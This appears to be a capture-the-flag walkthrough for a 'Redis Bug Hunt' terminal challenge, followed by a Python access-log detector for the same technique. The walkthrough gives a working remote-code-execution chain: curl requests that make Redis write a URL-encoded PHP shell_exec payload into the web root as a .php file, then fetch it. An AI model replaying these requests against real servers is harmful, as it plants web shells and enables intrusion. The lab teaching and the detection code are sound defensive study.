Terminal - Redis Bug Hunt
Terminal
- Elf: Holly Evergreen
- Location: Kitchen
- Related to Objective: 8
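The goal of this terminal challenge is to teach you about Redis RCE. To achieve RCE, you write PHP code that executes a command and have Redis save it into the web root: the queries below point the Redis dump directory at /var/www/html, give the dump file a .php name, store the PHP code in a key, and save. The PHP code needs to be URL-encoded. You can then use the following queries to run the URL-encoded PHP code.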
curl http://localhost/maintenance.php?cmd=config,set,dir,"/var/www/html"
curl http://localhost/maintenance.php?cmd=config,set,dbfilename,test1.php
curl http://localhost/maintenance.php?cmd=set,test1,####GET INDEX.PHP URL ENCODED COMMAND####
curl http://localhost/maintenance.php?cmd=save
curl http://localhost/test1.php --output blah.txt
Here is PHP code to get index.php:
<?php
$output = shell_exec('cat index.php');
echo "<pre>$output</pre>";
?>
Use CyberChef to perform the URL encoding.
Here is the URL encoding for the above PHP code. You need to replace ####GET INDEX.PHP URL ENCODED COMMAND#### in the above queries with the following:
%3C%3Fphp%0A%24output%20%3D%20shell%5Fexec%28%27cat%20index%2Ephp%27%29%3B%0Aecho%20%22%3Cpre%3E%24output%3C%2Fpre%3E%22%3B%0A%3F%3E%0A
Run the above curl queries to get the following:
Answer
Here are the answers to this terminal challenge:
curl http://localhost/maintenance.php?cmd=config,set,dir,"/var/www/html"
curl http://localhost/maintenance.php?cmd=config,set,dbfilename,test1.php
curl http://localhost/maintenance.php?cmd=set,test1,%3C%3Fphp%0A%24output%20%3D%20shell%5Fexec%28%27cat%20index%2Ephp%27%29%3B%0Aecho%20%22%3Cpre%3E%24output%3C%2Fpre%3E%22%3B%0A%3F%3E%0A
curl http://localhost/maintenance.php?cmd=save
curl http://localhost/test1.php --output blah.txt
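The request sequence above leaves a recognizable trail in the web server's access log. As an added example (not part of the original write-up), this Python detector flags a client that changes the Redis dump directory, gives the dump file a script extension and then saves. The log lines are constructed, and the combined-log format, client addresses, tag names and function names are assumptions; the comma-separated cmd parameter follows the requests shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined-log style), not taken from the challenge host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2020:10:00:01 +0000] "GET /maintenance.php?cmd=info HTTP/1.1" 200 512
10.0.0.5 - - [10/Dec/2020:10:00:05 +0000] "GET /maintenance.php?cmd=config,set,dir,/var/www/html HTTP/1.1" 200 64
10.0.0.5 - - [10/Dec/2020:10:00:07 +0000] "GET /maintenance.php?cmd=config,set,dbfilename,test1.php HTTP/1.1" 200 64
10.0.0.5 - - [10/Dec/2020:10:00:09 +0000] "GET /maintenance.php?cmd=set,test1,%3C%3Fphp%0Aecho%201%3B%0A%3F%3E HTTP/1.1" 200 64
10.0.0.5 - - [10/Dec/2020:10:00:11 +0000] "GET /maintenance.php?cmd=save HTTP/1.1" 200 64
10.0.0.9 - - [10/Dec/2020:10:05:00 +0000] "GET /maintenance.php?cmd=save HTTP/1.1" 200 64
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

def classify(args):
    """Tag one comma-split Redis command; None when nothing is notable."""
    args = [a.strip().strip('"') for a in args]
    verb = args[0].lower()
    if verb == "config" and len(args) >= 4 and args[1].lower() == "set":
        if args[2].lower() == "dir":
            return "dir"
        if args[2].lower() == "dbfilename" and SCRIPT_EXT.search(args[3]):
            return "script_dbfilename"
    if verb in ("set", "append", "setex") and any("<?" in a for a in args[1:]):
        return "php_tag"
    if verb in ("save", "bgsave"):
        return "save"
    return None

def scan(log_text, endpoint="/maintenance.php"):
    """Map client address -> ordered tags seen in its requests to the endpoint."""
    seen = {}
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or url.path != endpoint:
            continue
        # parse_qs percent-decodes the value, so encoded payloads are inspected in clear
        for cmd in parse_qs(url.query).get("cmd", []):
            tag = classify(cmd.split(","))
            if tag:
                seen.setdefault(line.split(" ", 1)[0], []).append(tag)
    return seen

def writes_script_to_disk(tags):
    """True when one client redirected the dump, named it as a script, and saved."""
    return {"dir", "script_dbfilename", "save"} <= set(tags)
```

A lone `save` is routine, so the alert condition is the combination per client rather than any single command.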
After you solve the challenge Holly tells you the following: